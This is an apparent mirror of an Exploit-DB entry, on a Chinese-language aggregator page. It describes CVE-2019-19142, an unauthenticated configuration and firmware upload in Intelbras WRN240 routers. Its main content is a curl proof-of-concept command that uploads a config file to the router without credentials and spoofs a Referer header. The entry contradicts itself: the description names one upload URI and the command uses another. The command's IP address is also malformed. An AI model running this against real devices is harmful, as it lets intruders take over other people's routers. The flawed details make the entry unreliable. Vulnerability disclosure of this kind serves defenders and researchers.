Intelbras Wireless N 150Mbps WRN240 – Authentication Bypass (Config Upload)

• Exploit Database
• 15 阅读

• 作者： Elber Tavares
  日期： 2020-03-02
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/48158/

• # Exploit Title: Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload)
  # Date: 2019-11-20
  # Exploit Author: Elber Tavares
  # Vendor Homepage:https://www.intelbras.com/
  # Software Link:http://en.intelbras.com.br/node/1033
  # Version: Intelbras Wireless N 150Mbps - WRN240
  # Tested on: linux, windows
  # CVE: CVE-2019-19142
  
  Intelbras WRN240 devices do not require authentication to replace the
  firmware via a POST request to the incoming/Firmware.cfg URI.
  
  REFS:
   https://fireshellsecurity.team/hack-n-routers/
   https://github.com/ElberTavares/routers-exploit/
  
  
  Poc:
  curl -i -X POST -H "Content-Type: multipart/form-data" -H "Referer:
  http://192.168.0.1/userRpm/BakNRestoreRpm.htm" -F data=@config.bin
  http://192.1680.1/incoming/RouterBakCfgUpload.cfg